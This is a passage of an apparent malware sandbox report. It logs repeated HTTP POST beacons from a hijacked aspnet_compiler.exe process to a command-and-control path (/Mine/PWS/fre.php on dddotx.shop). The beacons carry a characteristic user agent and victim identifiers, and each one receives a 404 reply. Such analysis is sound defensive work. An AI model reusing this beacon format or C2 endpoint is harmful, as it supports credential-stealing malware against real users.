              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TXG7r5L21clLv5eWf95MLCFwYSMotEARVK%2FaP1YQNYWXF2FoHoRYY0qhC6lkhFPflXLWG3kg0eluETGYMPL1FhDRBSErm4Ni4fjZTUjoRDwUk6AozwBbPAj4l4xPvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998dcaddfc324-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              112192.168.2.749817188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:49.171890020 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:49.177011013 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:50.103172064 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:50 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6g%2Bu8iU7RVnw1H3O3WsJKk6HYfQY5E0tO1uroo4uVcqHzrZaFHb%2BYVND7U3m%2B1miyYPJi4wjxgAUi3KpiCvDXVtA%2FPwaCXTx84MbQjkwNDPbvKSQv9j2jvqDcLakFw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998e1f86843fe-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              113192.168.2.749818188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:50.259907961 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:50.264754057 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:50.943537951 CEST571INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:50 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eq0zNyrutuio9j8nmCVRNhIS11cpB6SwCqEEt100K1XL21xjHEVmklKlNngDERwIMKAts5%2FIT3mgkke%2BjNZvcVvP7CG5MHgcMFj%2FBPEiLHtA4n3kYoT%2B%2Fvd4OStSJw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998e8aaac7287-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              114192.168.2.749819188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:51.108577967 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:51.117098093 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:51.808655977 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:51 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HiCoRu50K94YqKMNXS5S0RkBEXA8LcnROofghhbTZWFGu%2FK0vyNXE1eMkhDMLjsCxtkTZ2F5ASasqMuOk7Z6p9pbcpDK%2BqvqMxG9vLdvU3lDwUcRuP8uHg0%2Ft0OAMg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998ee1be94332-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              115192.168.2.749820188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:51.960999966 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:51.965925932 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:52.620332956 CEST573INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:52 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qr5pKYQ6%2F5OLfsG%2FEDe79%2BwxzCUBiOMlwNpJhJQipYAa3J8aIyL6cPYAaoeCnwavV4KesEdNwwcUJY92zGhdOc9qlnKmVDtq%2FSyIlVSeHBZdrp%2FtswvXieCu%2BHRUGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998f36b687c93-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              116192.168.2.749821188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:52.842784882 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:52.847889900 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:53.479537010 CEST599INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:53 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pxwNA5SuCsl4qq09zRcrlpxL85arzvbxIeEb%2FIAyJtVhAVJkO5tzJUBL4IcOjhRbMhWc6gXlX8%2FXgDPl5lge0WbkdmTcPP07ILu7I%2Feppe6dzlwujS4WEim%2FSGdRw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998f88c4b42c7-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              117192.168.2.749822188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:53.643552065 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:53.648400068 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:54.312777996 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:54 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qsYbMJdF%2FKgpwwcPl9bC%2F2y4exCPTYkp9Z8yjBoBwTU8mTtRGcOTKatQDlmkHJFfZJELnO1BS39j0PF%2BI2ZgknxLEq39ziFQMsBPZ1I6uTlX%2BnzLrV7CrSP3f5yv9g%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998fdde1343ed-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              118192.168.2.749823188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:54.462533951 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:54.469238997 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:55.120852947 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:55 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2FBmmKVx5ZmWofONc72GEepNlLupNVwqrPytvvPE9VYOveH22R%2BZDPcWkS6mjDrBhe%2FMtA1dgil9X7yB6skSpOszbcFsI6FB0vTa5qo399Pdfy2yPwAr0V7ME5kJw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899902fa4343c1-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              119192.168.2.749824188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:55.272775888 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:55.277762890 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:55.938739061 CEST563INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:55 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X8x5HmqQRp2BvBbbVzS6B02LCjxLojHG74mNK2KnvJSO1ba3azho7SmADP5yGgfZrbMk02pXXJzZ0yk7mfW8irBrsR%2FnG3zBkNxqSyJe7JcHMMgdI6FOc2r3RXRxGw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899907fba242cb-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              120192.168.2.749825188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:56.090480089 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:56.095547915 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:56.779473066 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:56 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TYNPQvfEvhcxvWS5VOwyv1yCxKs9S6JEkOwfyx3RjxadntpJv2RzLrlFZRp56wfTzQ2dmLvOX8O9Hv2L%2FvZBIT4sak%2BxLo1vG8eTncdh5iPL6uHT%2BlQlPccAjOMZVA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89990d18c30f8b-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              121192.168.2.749826188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:56.934875011 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:56.943671942 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:57.616049051 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:57 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKak2L11Xor6Cks1pxpaUNVX7%2FG3MWLUmSZSG1rQ1w0JNo1uVK0NRltaH4BAjCkUnG2Y8%2BsWnC%2FiR9eMIYPmoOqeD1Z5NjZ5wYAYxNOcqXJpEuIjPpLGKn8FVhGs%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8999125e44c328-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              122192.168.2.749827188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:57.760231972 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:57.765116930 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:58.434281111 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:58 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N4rH88egtgd%2BmdE0RFrzRYFc74p1SlsBf6cIp1oInjThlXgm4WQ5dIGCS28TId35WAASkWcoMynTtj09kEA7fCbc01aa%2BTwWQNkygn4j%2B5zhG%2FjLxGcHceh69tjzjA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8999179cdd1986-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              123192.168.2.749828188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:58.598668098 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:58.604734898 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:59.260694981 CEST593INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:59 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8r09Fk3GS1KIdlpuUcIu5XLceQyeTbydkjA1Tfayb5YOsfLWEAg0S9sJDQCPI3T4TSHeH2NDY61dqA7fvQ%2Be621zKyBBvBFznmJYmnUIaQwBPYPIh8DCjtrsSRJv7w%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89991cc9b9437f-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              124192.168.2.749829188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:59.417433023 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:59.720005989 CEST405OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:00.485549927 CEST561INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:00 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e4O5SjfyKvTvkcIORLmMnvmUOjGDOBiHXCjmczcCi5SRaa4TwCPstAOVz5AReChb2g5mRllfaNU1j2Y6BHgbfZFf869hVw2cjN8CFbVHN6J9UqY9KxfKQD5D9H9xMg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8999243c61c431-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              125192.168.2.749830188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:21:00.647304058 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:21:00.652378082 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:21:01.352046967 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:21:01 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMOcjA%2BZD9nEySF8HZ0ApDjYpEAhiuWRxzAwsZU1bdsxiwev9gOZAvYFdH1M4ugHcscx21X4kx5WCGigAmgPBFZ%2FOleLygR2dZqyqKfAbrdHLmHGBKVv2mX2C4YsiA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899929aed28cb9-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              126192.168.2.749831188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:21:01.504525900 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
